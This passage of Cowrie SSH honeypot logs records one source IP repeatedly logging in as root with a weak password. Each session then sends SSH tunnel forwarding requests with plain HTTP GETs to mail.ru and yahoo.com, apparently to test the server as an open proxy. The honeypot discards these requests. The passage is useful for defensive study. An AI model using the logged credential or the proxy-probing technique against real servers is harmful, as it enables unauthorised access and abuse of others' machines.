{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.991224Z","src_ip":"77.83.207.83","session":"a28af30ca32e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6958,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6958","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.042201Z","session":"a28af30ca32e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.092668Z","src_ip":"77.83.207.83","session":"a28af30ca32e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":19125,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19125","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.236893Z","session":"a28af30ca32e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.286815Z","src_ip":"77.83.207.83","session":"a28af30ca32e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":11427,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11427","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.428045Z","session":"a28af30ca32e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.479300Z","src_ip":"77.83.207.83","session":"a28af30ca32e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.529896Z","src_ip":"77.83.207.83","session":"a28af30ca32e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6973,"dst_ip":"1.2.3.4","dst_port":22,"session":"34678145653f","protocol":"ssh","message":"New connection: 77.83.207.83:6973 (1.2.3.4:22) [session: 34678145653f]","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.578889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.579765Z","src_ip":"77.83.207.83","session":"34678145653f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.629942Z","src_ip":"77.83.207.83","session":"34678145653f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.878912Z","src_ip":"77.83.207.83","session":"34678145653f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32304,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32304","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.929713Z","session":"34678145653f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:02.980572Z","src_ip":"77.83.207.83","session":"34678145653f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":31257,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31257","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.124618Z","session":"34678145653f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.174897Z","src_ip":"77.83.207.83","session":"34678145653f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":903,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:903","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.316174Z","session":"34678145653f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.366228Z","src_ip":"77.83.207.83","session":"34678145653f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.416898Z","src_ip":"77.83.207.83","session":"34678145653f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7076,"dst_ip":"1.2.3.4","dst_port":22,"session":"98b1c554aba7","protocol":"ssh","message":"New connection: 77.83.207.83:7076 (1.2.3.4:22) [session: 98b1c554aba7]","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.466381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.467169Z","src_ip":"77.83.207.83","session":"98b1c554aba7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.517846Z","src_ip":"77.83.207.83","session":"98b1c554aba7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.768861Z","src_ip":"77.83.207.83","session":"98b1c554aba7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7412,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7412","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.820426Z","session":"98b1c554aba7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:03.870847Z","src_ip":"77.83.207.83","session":"98b1c554aba7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":13164,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13164","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.012675Z","session":"98b1c554aba7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.063212Z","src_ip":"77.83.207.83","session":"98b1c554aba7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":18586,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18586","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.204613Z","session":"98b1c554aba7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.255145Z","src_ip":"77.83.207.83","session":"98b1c554aba7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.306227Z","src_ip":"77.83.207.83","session":"98b1c554aba7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7177,"dst_ip":"1.2.3.4","dst_port":22,"session":"78f036c741d9","protocol":"ssh","message":"New connection: 77.83.207.83:7177 (1.2.3.4:22) [session: 78f036c741d9]","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.356298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.357346Z","src_ip":"77.83.207.83","session":"78f036c741d9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.408758Z","src_ip":"77.83.207.83","session":"78f036c741d9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.665425Z","src_ip":"77.83.207.83","session":"78f036c741d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6786,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6786","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.719092Z","session":"78f036c741d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.770612Z","src_ip":"77.83.207.83","session":"78f036c741d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":7647,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7647","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.917762Z","session":"78f036c741d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:04.969213Z","src_ip":"77.83.207.83","session":"78f036c741d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":2159,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2159","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.113644Z","session":"78f036c741d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.164932Z","src_ip":"77.83.207.83","session":"78f036c741d9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.217237Z","src_ip":"77.83.207.83","session":"78f036c741d9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7251,"dst_ip":"1.2.3.4","dst_port":22,"session":"04ea1cf0b531","protocol":"ssh","message":"New connection: 77.83.207.83:7251 (1.2.3.4:22) [session: 04ea1cf0b531]","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.265964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.275862Z","src_ip":"77.83.207.83","session":"04ea1cf0b531"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.316473Z","src_ip":"77.83.207.83","session":"04ea1cf0b531"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.564241Z","src_ip":"77.83.207.83","session":"04ea1cf0b531"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21183,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21183","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.614916Z","session":"04ea1cf0b531"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.664699Z","src_ip":"77.83.207.83","session":"04ea1cf0b531"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5427,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5427","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.804086Z","session":"04ea1cf0b531"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.853886Z","src_ip":"77.83.207.83","session":"04ea1cf0b531"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":595,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:595","sensor":"my-vps","timestamp":"2025-08-31T03:49:05.996141Z","session":"04ea1cf0b531"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.046053Z","src_ip":"77.83.207.83","session":"04ea1cf0b531"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.096653Z","src_ip":"77.83.207.83","session":"04ea1cf0b531"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7329,"dst_ip":"1.2.3.4","dst_port":22,"session":"0815bb4af196","protocol":"ssh","message":"New connection: 77.83.207.83:7329 (1.2.3.4:22) [session: 0815bb4af196]","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.145549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.146653Z","src_ip":"77.83.207.83","session":"0815bb4af196"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sh